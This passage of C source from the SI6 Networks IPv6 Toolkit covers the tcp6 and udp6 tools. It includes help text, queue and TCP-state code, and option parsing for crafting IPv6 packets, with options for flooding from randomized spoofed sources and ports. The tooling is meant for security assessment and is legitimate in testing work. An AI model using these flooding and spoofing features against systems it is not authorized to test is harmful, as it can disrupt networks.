[-y FRAG_SIZE] [-u DST_OPT_HDR_SIZE] " "[-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P PAYLOAD_SIZE] [-o SRC_PORT] " "[-a DST_PORT] [-X TCP_FLAGS] [-q TCP_SEQ] [-Q TCP_ACK] [-V TCP_URP] [-w TCP_WIN] " "[-c OPEN_MODE] [-C CLOSE_MODE] [-Z DATA] [-P PAYLOAD_SIZE] [-W WIN_MODE]" "[-M WIN_MOD_MODE] [-r RATE] [-p PROBE_MODE] [-x RETRANS] " "[-N] [-n] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]] [-J LINK_ADDR] [-K LINK_ADDR] " "[-b PREFIX[/LEN]] [-g PREFIX[/LEN]] [-B LINK_ADDR] [-G LINK_ADDR] " "[-F N_SOURCES] [-T N_PORTS] [-L | -l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the tcp6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "tcp6: Security assessment tool for attack vectors based on TCP/IPv6 packets\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --payload-size, -P TCP Payload Size\n" " --src-port, -o TCP Source Port\n" " --dst-port, -a TCP Destination Port\n" " --tcp-flags, -X TCP Flags\n" " --tcp-seq, -q TCP Sequence Number\n" " --tcp-ack, -Q TCP Acknowledgment Number\n" " --not-ack-data, -N Do not acknowledge the TCP payload\n" " --not-ack-flags, -n Do not acknowledge the TCP flags\n" " --tcp-urg, -V TCP Urgent Pointer\n" " --tcp-win, -w TCP Window\n" " --window-mode, -W TCP Window mode {close,modulate}\n" " --win-modulation, -M TCP Window modulation (WIN1:TIME1:WIN2:TIME2)\n" " --open-mode, -c Open mode {simultaneous,passive,abort,active}\n" " --close-mode, -C Close mode {simultaneous,passive,abort\n" " active,FIN-WAIT-1,FIN-WAIT-2,LAST-ACK}\n" " --data, -Z TCP payload data\n" " --rate-limit, -r Rate limit the address scan to specified rate\n" " --probe-mode, -p TCP probe mode {dump,script}\n" " --retrans, -x Set number of TCP retransmissions\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --flood-sources, -F Flood from multiple IPv6 Source Addresses\n" " --flood-ports, -T Flood from multiple TCP Source Ports\n" " --listen, -L Listen to incoming packets\n" " --loop, -l Send periodic TCP segments\n" " --sleep, -z Pause between sending TCP segments\n" " --help, -h Print help for the tcp6 tool\n" " --verbose, -v Be verbose\n" "\n" "Programmed by Fernando Gont for SI6 Networks \n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts(SI6_TOOLKIT); puts( "tcp6: Security assessment tool for attack vectors based on TCP/IPv6 packets\n"); if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodp_f) printf("Flooding the target from %u different TCP ports\n", nports); if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else{ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!(idata->hsrcaddr_f))?" (randomized)":"")); } else puts("Ethernet Source Address: Automatically selected for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s\n", plinkaddr); } } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcaddr_f != TRUE)?" (randomized)":"")); } } else{ printf("IPv6 Source Address: randomized, from the fc00:1::/%u prefix%s\n", idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); /* printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); */ } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(idata->dstaddr_f){ if(!floodp_f || (floodp_f && nports ==1)){ printf("Source Port: %u%s\t", srcport, (srcport_f?"":" (randomized)")); } else{ printf("Source Port: (randomized)\t"); } printf("Destination Port: %u%s\n", dstport, (dstport_f?"":" (randomized)")); if( (floods_f || floodp_f) && (nsources != 1 || nports != 1)){ printf("SEQ Number: (randomized)\t"); } else{ printf("SEQ Number: %u%s\t", tcpseq, (tcpseq_f?"":" (randomized)")); } if( (floods_f || floodp_f) && (nsources != 1 || nports != 1)){ printf("ACK Number: (randomized)\n"); } else{ printf("ACK Number: %u%s\n", tcpack, (tcpack_f?"":" (randomized)")); } if(tcpflags_f){ printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); } else{ printf("Flags: Auto\t"); } if(window_f){ printf("Window (initial): %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); if(window == WIN_CLOSED) printf("Window: Closed\n"); else if(window == WIN_MODULATE) printf("\nWindow: Modulated (%u byte%s (%u second%s), %u byte%s (%u second%s))\n",\ win1_size, ((win1_size>1)?"s":""), time1_len, ((time1_len>1)?"s":""), \ win2_size, ((win2_size>1)?"s":""), time2_len, ((time2_len>1)?"s":"")); } else{ printf("Window: %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); } printf("URG Pointer: %u%s\n", tcpurg, (tcpurg_f?"":" (default)")); } else{ printf("Source Port: Auto\tDestination Port: Auto\n"); if(tcpseq_f){ printf("SEQ Number: %u\t", tcpseq); } else{ printf("SEQ Number: Auto\t"); } if(tcpack_f){ printf("ACK Number: %u\n", tcpack); } else{ printf("ACK Number: Auto\n"); } if(tcpflags_f){ printf("Flags: %s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":"")); } else{ printf("Flags: Auto\t"); } if(window_f){ printf("Window (initial): %u%s\t", tcpwin, (tcpwin_f?"":" (randomized)")); if(window == WIN_CLOSED) printf("Window: Closed\n"); else if(window == WIN_MODULATE) printf("\nWindow: Modulated (%u byte%s (%u second%s), %u byte%s (%u second%s))\n",\ win1_size, ((win1_size>1)?"s":""), time1_len, ((time1_len>1)?"s":""), \ win2_size, ((win2_size>1)?"s":""), time2_len, ((time2_len>1)?"s":"")); } else{ printf("Window: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)")); } } } /* * Function: queue_data() * * Puts data into a queue */ unsigned int queue_data(struct tcp_queue *q, unsigned char *data, unsigned int nbytes){ unsigned int fbytes, nleft; /* We have to scenarios: in >= out and in < out In the first scenario, the circular buffer may be "split in two". In the second one, all available space is clustered together. */ if(q->in >= q->out){ fbytes= (q->data+ q->size) - q->in -1; fbytes= fbytes+ (q->out - q->data); if(nbytes > fbytes) nbytes= fbytes; /* There is enough space available on the right side of the buffer */ if( (q->data + q->size - q->in) >= nbytes){ memcpy(q->in, data, nbytes); q->in= q->in + nbytes; if(q->in == (q->data + q->size)) q->in= q->data; return(nbytes); } else{ nleft= nbytes; memcpy(q->in, data, (q->data + q->size - q->in)); nleft= nleft - (q->data + q->size - q->in); q->in= q->data; memcpy(q->in, data, nleft); return(nbytes); } } else{ fbytes= q->out - q->in - 1; if(nbytes > fbytes) nbytes= fbytes; memcpy(q->in, data, nbytes); q->in= q->in + nbytes; if(q->in == (q->data + q->size)) q->in= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: dequeue_data() * * Reads data from a queue */ unsigned int dequeue_data(struct tcp_queue *q, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; /* We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(q->out > q->in){ dbytes= (q->data+ q->size) - q->out; dbytes= dbytes+ (q->in - q->out); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - q->out) >= nbytes){ memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; memcpy(data, q->out, (q->data + q->size - q->out)); data= data+ (q->data + q->size - q->out); nleft= nleft - (q->data + q->size - q->out); q->out= q->data; memcpy(data, q->out, nleft); q->out= q->out + nleft; return(nbytes); } } else{ dbytes= q->in - q->out; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: queue_copy() * * Copies data from queue, without removing it */ unsigned int queue_copy(struct tcp_queue *q, unsigned char *org, unsigned int offset, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; if(org+offset >= (q->data + q->size)){ org= q->data + offset - (q->data + q->size - org); } /* | in out We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(org > q->in){ dbytes= (q->data+ q->size) - org; dbytes= dbytes+ (q->in - org); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - org) >= nbytes){ memcpy(data, org, nbytes); return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; memcpy(data, org, (q->data + q->size - org)); data= data + (q->data + q->size - org); nleft= nleft - (q->data + q->size - org); org= q->data; memcpy(data, org, nleft); return(nbytes); } } else{ dbytes= q->in - org; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, org, nbytes); return(nbytes); } /* Should never reach here, buts avoid compiler warnings */ return(0); } /* * Function: queue_remove() * * Discards data from queue * Note: This function is employed to discard data from the TCP send buffer when they are ACKed * by the remote TCP endpoint. */ unsigned int queue_remove(struct tcp_queue *q, unsigned char *data, unsigned int nbytes){ unsigned int dbytes, nleft; /* We have to scenarios: out > in and out <= in In the first scenario, the circular buffer may be "split in two". In the second one, all available data are clustered together. */ if(q->out > q->in){ dbytes= (q->data+ q->size) - q->out; dbytes= dbytes+ (q->in - q->out); if(nbytes > dbytes) nbytes= dbytes; /* There is enough data available on the right side of the buffer */ if( (q->data + q->size - q->out) >= nbytes){ q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } else{ /* Data are split in two parts */ nleft= nbytes; data= data+ (q->data + q->size - q->out); nleft= nleft - (q->data + q->size - q->out); q->out= q->data; q->out= q->out + nleft; return(nbytes); } } else{ dbytes= q->in - q->out; if(nbytes > dbytes) nbytes= dbytes; memcpy(data, q->out, nbytes); q->out= q->out + nbytes; if(q->out == (q->data + q->size)) q->out= q->data; return(nbytes); } /* Should never reach here, but avoid compiler warnings */ return(0); } /* * Function: tcp_init() * * Initilizes a TCP structure */ int tcp_init(struct tcp *tcp){ memset(&(tcp->srcaddr), 0, sizeof(struct in6_addr)); memset(&(tcp->dstaddr), 0, sizeof(struct in6_addr)); tcp->srcport= 0; tcp->dstport= 0; tcp->in.in = tcp->in.data; tcp->in.out= tcp->in.data; tcp->in.size= sizeof(tcp->in.data); tcp->rcv_nxt= 0; tcp->rcv_nxtwnd= 0; tcp->out.in= tcp->out.data; tcp->out.out= tcp->out.data; tcp->out.size= sizeof(tcp->out.data); tcp->out_una= tcp->out.data; tcp->out_nxt= tcp->out.data; tcp->snd_una=0; tcp->snd_nxtwnd=0; memset(&(tcp->time), 0, sizeof(struct timeval)); tcp->state= TCP_CLOSED; tcp->ack= 0; tcp->win= sizeof(tcp->in.data) - 1; return(SUCCESS); } /* * Function: tcp_open() * * Performs an open (active or passive) on a TCP socket */ int tcp_open(struct iface_data *idata, struct tcp *tcb, unsigned int mode){ if(mode == OPEN_ACTIVE){ tcb->state= TCP_SYN_SENT; tcb->flags= TH_SYN; tcb->snd_una= random(); tcb->snd_nxt= tcb->snd_una + 1; tcb->pending_write_f= TRUE; return(SUCCESS); } else if(mode == OPEN_PASSIVE){ tcb->state= TCP_LISTEN; return(SUCCESS); } return(FAILURE); } /* * Function: tcp_close() * * Performs a close on a TCP socket */ int tcp_close(struct iface_data *idata, struct tcp *tcb){ tcb->fin_flag= TRUE; tcb->fin_seq= tcb->snd_nxt; tcb->pending_write_f= TRUE; return(SUCCESS); } /* * Function: tcp_send() * * Sends data over TCP (actually copies it to the TCP send buffer) */ int tcp_send(struct iface_data *idata, struct tcp *tcb, unsigned char *data, unsigned int nbytes){ if(tcb->fin_flag == TRUE) return(-1); else return(queue_data( &(tcb->out), data, nbytes)); } /* * Function: tcp_receive() * * Receive data from a TCP socket */ int tcp_receive(struct iface_data *idata, struct tcp *tcb, unsigned char *data, unsigned int nbytes){ unsigned int r; r= dequeue_data(&(tcb->in), data, nbytes); if(r > 0) tcb->pending_write_f= TRUE; return(r); } /* * Function: tcp_input() * * Processes an incoming TCP segment */ int tcp_input(struct iface_data *idata, struct tcp *tcb, const u_char *pktdata, struct pcap_pkthdr *pkthdr, struct packet *packet){ return(SUCCESS); } /* * Function: tcp_output() * * Sends TCP segments as necessary */ int tcp_output(struct iface_data *idata, struct tcp *tcb, struct packet *packet, struct timeval *curtime){ /* Placeholder */ return(SUCCESS); } /* * Function: is_valid_tcp_segment() * * Performs sanity checks on an incomming TCP/IPv6 segment */ int is_valid_tcp_segment(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; unsigned char *pkt_end; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_tcp = (struct tcp_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* XXX: We are assuming no extension headers on incoming packets -- this should be improved! */ /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_tcp + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_tcp + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a TCP header */ if( (pkt_end - (unsigned char *) pkt_tcp) < sizeof(struct tcp_hdr)){ return FALSE; } /* Check that the TCP checksum is correct */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0){ return FALSE; } /* XXX: Should perform additional checks on the IPv6 header */ /* Sanity checks on the Source Address and the Destination Address */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_dst))){ return FALSE; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))){ return FALSE; } return TRUE; } ipv6toolkit-2.0+ds.1/tools/tcp6.h000066400000000000000000000045611254360455000166050ustar00rootroot00000000000000/* * Header file for the tcp6 tool * */ /* Constants used for specification of TCP connection establishment */ #define OPEN_PASSIVE 1 #define OPEN_SIMULTANEOUS 2 #define OPEN_ABORT 3 #define OPEN_ACTIVE 4 /* Constants used for specification of TCP connection termination */ #define CLOSE_ACTIVE 1 #define CLOSE_PASSIVE 2 #define CLOSE_SIMULTANEOUS 3 #define CLOSE_ABORT 4 #define CLOSE_FIN_WAIT_1 5 #define CLOSE_FIN_WAIT_2 6 #define CLOSE_LAST_ACK 7 /* Constants for TCP window operation */ #define WIN_CLOSED 1 #define WIN_MODULATE 2 #define WIN_MODULATE_CLOSED_SIZE 0 #define WIN_MODULATE_CLOSED_LEN 60 #define WIN_MODULATE_OPEN_SIZE 10 #define WIN_MODULATE_OPEN_LEN 30 #define TCP_RTO 1 /* Constants for specifying the TCP connection state */ #define TCP_CLOSED 1 #define TCP_LISTEN 2 #define TCP_SYN_SENT 3 #define TCP_SYN_RECV 4 #define TCP_ESTABLISHED 5 #define TCP_FIN_WAIT_1 6 #define TCP_FIN_WAIT_2 7 #define TCP_CLOSE_WAIT 8 #define TCP_LAST_ACK 9 #define TCP_CLOSING 10 #define TCP_TIME_WAIT 11 /* Constants for debug mode */ #define PROBE_DUMP 1 #define PROBE_SCRIPT 2 /* Constants for TCP buffers */ #define TCP_BUFFER_SIZE 65535 #define TCP_INPUT_BUFFER_SIZE TCP_BUFFER_SIZE #define TCP_OUTPUT_BUFFER_SIZE TCP_BUFFER_SIZE struct tcp_queue{ unsigned char data[TCP_BUFFER_SIZE]; unsigned char *in; unsigned char *out; unsigned int size; /* unsigned int data; */ unsigned int free; }; struct tcp{ struct in6_addr srcaddr; struct in6_addr dstaddr; uint16_t srcport; uint16_t dstport; struct tcp_queue in; uint32_t rcv_nxt; uint32_t rcv_nxtwnd; struct tcp_queue out; unsigned char *out_una; unsigned char *out_nxt; /* una nxt */ uint32_t snd_una; uint32_t snd_nxt; uint32_t snd_nxtwnd; uint32_t snd_seq; /* TCP seq to use for outgoing segments (for RSTs) */ uint32_t snd_wl1; uint32_t snd_wl2; unsigned char fin_flag; uint32_t fin_seq; struct timeval time; unsigned int state; unsigned int open; unsigned int close; uint8_t flags; uint32_t ack; uint32_t win; unsigned int fbytes; unsigned char pending_write_f; unsigned int rto; }; #define SEQ_LT(a,b) ((int)((a)-(b)) < 0) #define SEQ_LEQ(a,b) ((int)((a)-(b)) <= 0) #define SEQ_GT(a,b) ((int)((a)-(b)) > 0) #define SEQ_GEQ(a,b) ((int)((a)-(b)) >= 0) #define SEQ_EQ(a,b) ((int)((a)-(b)) == 0) ipv6toolkit-2.0+ds.1/tools/udp6.c000066400000000000000000001541761254360455000166120ustar00rootroot00000000000000/* * udp6 : A security assessment tool that exploits potential flaws in the * processing of UDP/IPv6 packets * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make udp6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "udp6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); void frag_and_send(struct iface_data *); int is_valid_udp_datagram(struct iface_data *, const u_char *, struct pcap_pkthdr *); /* Flags */ unsigned char floodt_f=0; unsigned char listen_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char hoplimit_f=0, rand_link_src_f=0, rand_src_f=0; unsigned char floods_f=0, floodp_f=0, donesending_f=0; unsigned char data_f=0, senddata_f=0, useaddrkey_f=0; /* Flags used for UDP (specifically) */ unsigned char srcport_f=0, dstport_f=0; unsigned char rhbytes_f=0; unsigned char pps_f=0, bps_f=0, probemode_f=0, retrans_f=0, rto_f=0; unsigned int probemode; uint16_t srcport, dstport; unsigned int retrans, rto; unsigned int rhbytes, currentsize, packetsize; /* Used for router discovery */ struct iface_data idata; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct nd_neighbor_solicit *pkt_ns; struct ip6_hdr *pkt_ipv6; struct udp_hdr *pkt_udp; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_UDP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; char data[DATA_BUFFER_LEN]; unsigned int datalen; char iface[IFACE_LENGTH]; char line[LINE_BUFFER_SIZE]; struct ip6_hdr *ipv6; struct udp_hdr *udp; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr, randprefix; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val, rate; unsigned int i, j, startrand; unsigned int skip; unsigned int sources, nsources, ports, nports, nsleep; unsigned char randpreflen; uint16_t mask; uint8_t hoplimit; uint16_t addr_key; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct filters filters; int main(int argc, char **argv){ extern char *optarg; /* char *endptr; Used by strtoul() */ fd_set sset, rset; /* fd_set wset, eset; */ int r, sel; struct timeval timeout, stimeout, curtime, lastprobe; unsigned char end_f=0; unsigned long pktinterval=0; unsigned int retr=0; struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"data", required_argument, 0, 'Z'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"payload-size", required_argument, 0, 'P'}, {"src-port", required_argument, 0, 'o'}, {"dst-port", required_argument, 0, 'a'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-ports", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"rate-limit", required_argument, 0, 'r'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"probe-mode", required_argument, 0, 'p'}, {"retrans", required_argument, 0, 'x'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:Z:u:U:H:y:S:D:P:o:a:j:k:J:K:b:g:B:G:F:T:lr:z:Lp:x:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; pktinterval= 0; lastprobe.tv_sec= 0; lastprobe.tv_usec= 0; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option){ case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'Z': /* Data */ datalen= Strnlen(optarg, MAX_CMDLINE_OPT_LEN); if(datalen >= DATA_BUFFER_LEN) datalen= DATA_BUFFER_LEN-1; strncpy(data, optarg, DATA_BUFFER_LEN-1); data_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); 